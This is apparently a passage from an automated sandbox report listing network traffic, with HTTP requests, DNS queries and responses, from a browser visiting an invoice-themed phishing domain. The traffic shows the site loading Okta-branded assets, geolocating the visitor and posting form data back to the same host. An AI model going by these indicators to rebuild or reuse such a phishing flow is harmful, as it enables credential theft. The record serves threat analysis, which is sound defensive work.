                Source: global trafficHTTP traffic detected: GET /op328rcsbOGBUSeGtzq25hcrvpTsZOfghsLFQq1ELO8tMocL4jZef199 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /qr347VQocLux8bJ296y3sGsK0qKDjDkaqzGUesuvjEQdpuQn0RocxGsyZziUJj4ef240 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijeLyVUGNsKP7COU4jZjq9x7klsBCi5YH6sFBErcQVzoldipaq9Ref210 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /uvtEwEyzMAhf6EpnunDLNl1fXrnAsov2mnPpoo2EjamMRPOTqFQN1a7tgWlOFf9HWC0Fgh260 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://2025_notificationx1invoice_review.fmhjhctk.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ylboqnupqfnuawqfsjesfkocbclIQzYGUEIIWPSNKSDXNYLKVQSYSBBZXDZMJXXPTrsIqrLA8B802U3m12HZGwx40 HTTP/1.1Host: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ylboqnupqfnuawqfsjesfkocbclIQzYGUEIIWPSNKSDXNYLKVQSYSBBZXDZMJXXPTrsJ1JGm4Ep8qArRqlzryzP9Vewx39 HTTP/1.1Host: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ylboqnupqfnuawqfsjesfkocbclIQzYGUEIIWPSNKSDXNYLKVQSYSBBZXDZMJXXPTpqKeZdnM34o6uv40 HTTP/1.1Host: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ylboqnupqfnuawqfsjesfkocbclIQzYGUEIIWPSNKSDXNYLKVQSYSBBZXDZMJXXPTrs5QynVpB912sptTbRwx40 HTTP/1.1Host: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ylboqnupqfnuawqfsjesfkocbclIQzYGUEIIWPSNKSDXNYLKVQSYSBBZXDZMJXXPTpqPCdpkF34Gr7Ywx40 HTTP/1.1Host: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /ylboqnupqfnuawqfsjesfkocbclIQzYGUEIIWPSNKSDXNYLKVQSYSBBZXDZMJXXPTpqnQf3AGd12TQpKuJluv35 HTTP/1.1Host: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBK HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /aNAtEaDInodo/ HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN6TGFTQkNvc1JXUVZLVGZwdjZNVEE9PSIsInZhbHVlIjoiQ3FVNjR6UFFFZXRLM0RHMDZkY1VSaHFqMGJVbnY4RUlBc1NqMUNEenVtekM4YzRlS3QyaUFIT3E5RzdmUnBiQndQdHAvc1phYUdKaXdoSXh0LzI1SytBMzNJTEszamZZdUlOZ3cvYnV3Zy9VRWtSUWt5Ui9EYVZkckhwbWR2MGMiLCJtYWMiOiJlNjhkMDZmNzM5MDFlYWU5OTk0ODlmOTgxYzY4MjVlNzAwZDA3MzU2MTQ3YzgwMzY5YmU4NzdmMTJiNzI4ZWJhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjR2NDVjSlpqMWdKRHVkV1gzdnRDWUE9PSIsInZhbHVlIjoiRGFqSFNLWlB6NHB3SUJsQ00wNXIwUllDZE44elY1d0FndXhidStXTlp4N2t3cTRGZFhFdHlFenNEYk16UDdHVmVadDl3ZHpyRmZjOTBGRXJzSlY4NVRoeUVYY2ZEUXVBT3dzRFJoOVErbjhZNmF3amRhRFErWVN1N0x3MTArWUciLCJtYWMiOiIyN2IwNWNmM2UwZTc1NmNiY2U0NWI0NDhmZmFhZjZkMDlkN2Y5MzllOTNiZTY1MWRmZmQxNmM3YmU4MzVlYTRjIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=6D1OqZqOk90p2FhVbY2uvjws2yqvfcYrLJOX6hJhS7k-1742245029-1.0.1.1-o6K.NzptcjyPwRwmM5r8YuPkSTusR2vCJSQO6i9hYsYHiIALUmvofSaiXsBOn9JlFu.OeQZ2RYKq3AQoix1kdA9CIqNWYy2IQcDLdK3Ulo8If-None-Match: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=6D1OqZqOk90p2FhVbY2uvjws2yqvfcYrLJOX6hJhS7k-1742245029-1.0.1.1-o6K.NzptcjyPwRwmM5r8YuPkSTusR2vCJSQO6i9hYsYHiIALUmvofSaiXsBOn9JlFu.OeQZ2RYKq3AQoix1kdA9CIqNWYy2IQcDLdK3Ulo8If-None-Match: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                Source: global trafficDNS traffic detected: DNS query: adclick.g.doubleclick.net
                Source: global trafficDNS traffic detected: DNS query: 2025_notificationx1invoice_review.fmhjhctk.ru
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: zy03ki.qakaco.ru
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: get.geojs.io
                Source: global trafficDNS traffic detected: DNS query: mdvdrzasmwqth3qml8y9wfk13vbyxtc66szdgcmvnowenilgvs1vtfskk3t.amayaxw.es
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: unknownHTTP traffic detected: POST /ve47VQocLux8bJ296yn6GsK0qKDjDkaqz7v HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveContent-Length: 775sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQAh9vEIyBPJXSCXBsec-ch-ua-mobile: ?0Accept: */*Origin: https://2025_notificationx1invoice_review.fmhjhctk.ruSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZSSjQ3YWQrUThmcFppczNPSU5qK2c9PSIsInZhbHVlIjoiZ205YVRMdWRyMjBFMFoxekJyd25xdmM1RVpOS04vQ2I1ME5BL3hKZW9oTWJndk01NTlrMzVMYUlYMmFRcTFZUExWZ3pHNXU3cjBKNTVSdGNESjVNZXpjNlJaaEtLcGs0a2l3bjZvS3FlUjg0VlZ2SXJsQ1dLbytBQmpaa2hscFgiLCJtYWMiOiI2OTAwODMyNjdkYTY2Y2NhNWY4NWJiZDkzMTM2MTU4ZDgzZmI4ZjU4YjUyZjFjODFjMTM3ZjFjYTQ1NzhlNGFlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklTczZwZ0NUUEsxakhzT2FvcVZlbHc9PSIsInZhbHVlIjoiMjk4MVpsdm03UXkyL1lKV3liOHZjLzQ1VjZJR0RXUVpRQVBZQlkrQ2RGdkhWUXgzNTdVUTZUTk9aREFJcnd2VC9RdDAwRldURUhoRFptMkx2K1RVYzdJblRNcUdYUFpsaFdWVEpPNStQMnBaajdESUlFczhjb2FBSGtaWEIydnoiLCJtYWMiOiJiN2E4NjViMTk4OTgyMTgyNDFmNDk3YWE3OWQzMmJjYWFmZTg1ZDQzMWQ3ZWQzZWU3Y2MzZjMyMmQxNWI2OTk2IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 20:57:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2nNpGMYBa77YWP4pp43vkEbY7cJyANS2DG%2Fuxtd%2FMFfeM68cDAKs2DIETqvjtW6nDX%2FrP%2BEJUV2jhPpfWnszOsFQhnKS92yX9be5s%2FV%2BCA6SfFMKVdPAZsIaQuu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1067&min_rtt=1052&rtt_var=323&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2072&delivery_rate=3604278&cwnd=253&unsent_bytes=0&cid=0069aba64dfa472d&ts=252&x=0"Server: cloudflareCF-RAY: 921f66e9a824134a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2029&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1739&delivery_rate=1409946&cwnd=91&unsent_bytes=0&cid=2b99c77b1406e897&ts=555&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 20:57:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFUFRtiPCxS72L2xH1FbMKhdKsciotrnKGZTXLOYHsPbNKTb6z78%2BUa2cz8QTjIHkX37G5IuKpvjtqaGaYzhiyfe2x8n07eaHK3PtEpNZqXBQvV6NDhw1lKTnyfL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=1015&min_rtt=1006&rtt_var=300&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2296&delivery_rate=3847764&cwnd=253&unsent_bytes=0&cid=99168aa2290f539b&ts=415&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 921f66f0396f847d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1675&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1961&delivery_rate=1743283&cwnd=114&unsent_bytes=0&cid=9e5611371c9c2ebb&ts=731&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 20:57:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sndl5AoVHEUA121nCMs96N4eq1Ym27q6GuWcCKzJdagYMVxHuEakHgGosoMYjYRUS0u6g2VyVUX8pMy0egLX%2FhZ7T5Lj3pTzg3v%2B1L6gfBCBA5ChY9nR2FQPcQI5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=895&min_rtt=887&rtt_var=265&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2081&delivery_rate=4279365&cwnd=252&unsent_bytes=0&cid=974f7bd32e44755b&ts=238&x=0"Server: cloudflareCF-RAY: 